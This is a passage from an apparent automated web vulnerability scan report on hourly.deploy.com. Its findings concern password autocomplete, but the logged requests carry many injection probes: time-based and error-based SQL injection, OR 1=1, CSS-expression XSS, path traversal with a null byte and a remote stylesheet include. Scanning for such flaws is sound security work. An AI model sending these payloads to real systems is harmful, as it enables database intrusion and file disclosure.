Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:48 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=1);DECLARE/**/@x/**/char(9);SET/**/@x=char(48)%2bchar(58)%2bchar(48)%2bchar(58)%2bchar(50)%2bchar(53);WAITFOR/**/DELAY/**/@x--" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.191. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=-111%20OR%201=(select+dbms_pipe.receive_message((chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(51)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))%2c25)+from+dual)%20 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:07 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:07 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=-111%20OR%201=(select+dbms_pipe.receive_message((chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(51)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))%2c25)+from+dual)%20" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.192. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B' HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:40 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:40 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B'" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.193. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=WAITFOR%20DELAY%20%270:0:25%27-- HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:40 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:40 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=WAITFOR%20DELAY%20%270:0:25%27--" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.194. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=1;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)%2bchar(58)%2bchar(48)%2bchar(58)%2bchar(50)%2bchar(53);WAITFOR/**/DELAY/**/@x-- HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30f0eb525229456582
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:47 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:47 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=1;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)%2bchar(58)%2bchar(48)%2bchar(58)%2bchar(50)%2bchar(53);WAITFOR/**/DELAY/**/@x--" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.195. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=body%7Bx:expression(netsparker(0x000051))%7D HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:52 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:52 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=body%7Bx:expression(netsparker(0x000051))%7D" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.196. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=(select+dbms_pipe.receive_message((chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(51)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))%2c25)+from+dual) HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:05 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:05 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=(select+dbms_pipe.receive_message((chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(51)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))%2c25)+from+dual)" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.197. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B' HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:45 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:45 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.198. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=-1+OR+1%3d1 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:39 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:39 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=-1+OR+1%3d1" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.199. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=//netsparker.com/n/n.css?0x00002B HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30f0eb525229456582
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:46 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:46 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=//netsparker.com/n/n.css?0x00002B" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.200. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=1)%3BSELECT%20pg_sleep(25)-- HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e3042a9b6d0213f1e43
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:09 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:09 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=1)%3BSELECT%20pg_sleep(25)--" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.201. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=../../../../../../../../../../proc/self/fd/2%00 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:42 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:42 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=../../../../../../../../../../proc/self/fd/2%00" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.202. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register='%2Bprint(int)0xFFF9999-22;// HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:44 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:44 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register='%2Bprint(int)0xFFF9999-22;//" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.203. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=(select%20chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(51)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97)%20from%20DUAL) HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:03 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:03 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=(select%20chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(51)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97)%20from%20DUAL)" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.204. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=-1+OR+17-7%3d10 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:44 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:44 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=-1+OR+17-7%3d10" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.205. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=convert(int,(CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))) HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:40 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:40 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=convert(int,(CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97)))" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.206. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=-111'))%20OR%20SLEEP(25)=0%20LIMIT%201--+ HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:04 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:04 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=-111'))%20OR%20SLEEP(25)=0%20LIMIT%201--+" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
